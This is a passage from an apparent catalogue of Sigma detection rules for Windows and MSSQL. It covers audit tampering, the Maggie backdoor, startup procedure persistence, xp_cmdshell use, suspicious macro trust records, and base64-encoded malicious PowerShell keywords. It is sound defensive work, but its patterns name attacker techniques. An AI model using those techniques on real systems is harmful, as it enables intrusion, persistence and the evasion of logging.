description: Detects when an attacker calls the "ALTER SERVER AUDIT" or "DROP SERVER AUDIT" transaction in order to delete or disable audit logs on the server
references:
- https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
- https://learn.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16
- https://learn.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-13
modified: 2024-06-26
tags:
- attack.defense-impairment
logsource:
product: windows
service: application
definition: 'Requirements: MSSQL audit policy must be enabled in order to receive this event in the application log'
# warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
detection:
selection:
Provider_Name|contains: 'MSSQL' # Note: We use contains to account for other third party providers - See https://github.com/SigmaHQ/sigma/issues/4876
EventID: 33205
Data|contains:
- 'statement:ALTER SERVER AUDIT'
- 'statement:DROP SERVER AUDIT'
condition: selection
falsepositives:
- This event should only fire when an administrator is modifying the audit policy. Which should be a rare occurrence once it's set up
level: high
Convert to SIEM query
high
Strong
Medium FP
MSSQL Extended Stored Procedure Backdoor Maggie
This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server
view Sigma YAML
title: MSSQL Extended Stored Procedure Backdoor Maggie
id: 711ab2fe-c9ba-4746-8840-5228a58c3cb8
status: test
description: This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server
references:
- https://medium.com/@DCSO_CyTec/mssql-meet-maggie-898773df3b01
author: Denis Szadkowski, DIRT / DCSO CyTec
date: 2022-10-09
tags:
- attack.privilege-escalation
- attack.persistence
- attack.t1546
- detection.emerging-threats
logsource:
product: windows
service: application
detection:
selection:
Provider_Name: 'MSSQLSERVER'
EventID: 8128
Message|contains: 'maggie'
condition: selection
falsepositives:
- Legitimate extended stored procedures named maggie
level: high
Convert to SIEM query
high
Strong
Medium FP
MSSQL SPProcoption Set
Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started
view Sigma YAML
title: MSSQL SPProcoption Set
id: b3d57a5c-c92e-4b48-9a79-5f124b7cf964
status: test
description: Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started
references:
- https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
- https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-procoption-transact-sql?view=sql-server-ver16
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-13
modified: 2024-06-26
tags:
- attack.persistence
logsource:
product: windows
service: application
definition: 'Requirements: MSSQL audit policy to monitor for "sp_procoption" must be enabled in order to receive this event in the application log'
# warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
detection:
selection:
Provider_Name|contains: 'MSSQL' # Note: We use contains to account for other third party providers - See https://github.com/SigmaHQ/sigma/issues/4876
EventID: 33205
Data|contains|all:
- 'object_name:sp_procoption'
- 'statement:EXEC'
condition: selection
falsepositives:
- Legitimate use of the feature by administrators (rare)
level: high
Convert to SIEM query
high
Strong
Medium FP
MSSQL XPCmdshell Option Change
Detects when the MSSQL "xp_cmdshell" stored procedure setting is changed.
view Sigma YAML
title: MSSQL XPCmdshell Option Change
id: d08dd86f-681e-4a00-a92c-1db218754417
status: test
description: |
Detects when the MSSQL "xp_cmdshell" stored procedure setting is changed.
references:
- https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
- https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-12
modified: 2024-06-26
tags:
- attack.execution
logsource:
product: windows
service: application
# warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
detection:
selection:
Provider_Name|contains: 'MSSQL' # Note: We use contains to account for other third party providers - See https://github.com/SigmaHQ/sigma/issues/4876
EventID: 15457
Data|contains: 'xp_cmdshell'
condition: selection
falsepositives:
- Legitimate enable/disable of the setting
- Note that since the event contain the change for both values. This means that this will trigger on both enable and disable
level: high
Convert to SIEM query
high
Moderate
Medium FP
MSSQL XPCmdshell Suspicious Execution
Detects when the MSSQL "xp_cmdshell" stored procedure is used to execute commands
view Sigma YAML
title: MSSQL XPCmdshell Suspicious Execution
id: 7f103213-a04e-4d59-8261-213dddf22314
status: test
description: Detects when the MSSQL "xp_cmdshell" stored procedure is used to execute commands
references:
- https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
- https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-12
modified: 2024-06-26
tags:
- attack.execution
logsource:
product: windows
service: application
definition: 'Requirements: MSSQL audit policy to monitor for "xp_cmdshell" must be enabled in order to receive this event in the application log (Follow this tutorial https://dba.stackexchange.com/questions/103183/is-there-any-way-to-monitor-execution-of-xp-cmdshell-in-sql-server-2012)'
# warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
detection:
selection:
Provider_Name|contains: 'MSSQL' # Note: We use contains to account for other third party providers - See https://github.com/SigmaHQ/sigma/issues/4876
EventID: 33205
Data|contains|all:
# You can modify this to include specific commands
- 'object_name:xp_cmdshell'
- 'statement:EXEC'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Moderate
High FP
Macro Enabled In A Potentially Suspicious Document
Detects registry changes to Office trust records where the path is located in a potentially suspicious location
view Sigma YAML
title: Macro Enabled In A Potentially Suspicious Document
id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd
related:
- id: 295a59c1-7b79-4b47-a930-df12c15fc9c2
type: derived
status: test
description: Detects registry changes to Office trust records where the path is located in a potentially suspicious location
references:
- https://twitter.com/inversecos/status/1494174785621819397
- Internal Research
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-06-21
modified: 2023-08-17
tags:
- attack.persistence
- attack.defense-impairment
- attack.t1112
logsource:
category: registry_set
product: windows
detection:
selection_value:
TargetObject|contains: '\Security\Trusted Documents\TrustRecords'
selection_paths:
TargetObject|contains:
# Note: add more locations where you don't expect a user to executed macro enabled docs
- '/AppData/Local/Microsoft/Windows/INetCache/'
- '/AppData/Local/Temp/'
- '/PerfLogs/'
- 'C:/Users/Public/'
- 'file:///D:/'
- 'file:///E:/'
condition: all of selection_*
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
Moderate
Medium FP
Malicious Base64 Encoded PowerShell Keywords in Command Lines
Detects base64 encoded strings used in hidden malicious PowerShell command lines
view Sigma YAML
title: Malicious Base64 Encoded PowerShell Keywords in Command Lines
id: f26c6093-6f14-4b12-800f-0fcb46f5ffd0
status: test
description: Detects base64 encoded strings used in hidden malicious PowerShell command lines
references:
- http://www.leeholmes.com/blog/2017/09/21/searching-for-content-in-base-64-strings/
author: John Lambert (rule)
date: 2019-01-16
modified: 2023-01-05
tags:
- attack.execution
- attack.t1059.001
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith:
- '\powershell.exe'
- '\pwsh.exe'
- OriginalFileName:
- 'PowerShell.EXE'
- 'pwsh.dll'
selection_hidden:
CommandLine|contains: ' hidden '
selection_encoded:
CommandLine|contains:
- 'AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA'
- 'aXRzYWRtaW4gL3RyYW5zZmVy'
- 'IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA'
- 'JpdHNhZG1pbiAvdHJhbnNmZX'
- 'YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg'
- 'Yml0c2FkbWluIC90cmFuc2Zlc'
- 'AGMAaAB1AG4AawBfAHMAaQB6AGUA'
- 'JABjAGgAdQBuAGsAXwBzAGkAegBlA'
- 'JGNodW5rX3Npem'
- 'QAYwBoAHUAbgBrAF8AcwBpAHoAZQ'
- 'RjaHVua19zaXpl'
- 'Y2h1bmtfc2l6Z'
- 'AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A'
- 'kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg'
- 'lPLkNvbXByZXNzaW9u'
- 'SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA'
- 'SU8uQ29tcHJlc3Npb2'
- 'Ty5Db21wcmVzc2lvb'
- 'AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ'
- 'kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA'
- 'lPLk1lbW9yeVN0cmVhb'
- 'SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A'
- 'SU8uTWVtb3J5U3RyZWFt'
- 'Ty5NZW1vcnlTdHJlYW'
- '4ARwBlAHQAQwBoAHUAbgBrA'
- '5HZXRDaHVua'
- 'AEcAZQB0AEMAaAB1AG4Aaw'
- 'LgBHAGUAdABDAGgAdQBuAGsA'
- 'LkdldENodW5r'
- 'R2V0Q2h1bm'
- 'AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A'
- 'QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA'
- 'RIUkVBRF9JTkZPNj'
- 'SFJFQURfSU5GTzY0'
- 'VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA'
- 'VEhSRUFEX0lORk82N'
- 'AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA'
- 'cmVhdGVSZW1vdGVUaHJlYW'
- 'MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA'
- 'NyZWF0ZVJlbW90ZVRocmVhZ'
- 'Q3JlYXRlUmVtb3RlVGhyZWFk'
- 'QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA'
- '0AZQBtAG0AbwB2AGUA'
- '1lbW1vdm'
- 'AGUAbQBtAG8AdgBlA'
- 'bQBlAG0AbQBvAHYAZQ'
- 'bWVtbW92Z'
- 'ZW1tb3Zl'
condition: all of selection_*
falsepositives:
- Unknown
level: high
Convert to SIEM query
Showing 551-600 of 1,713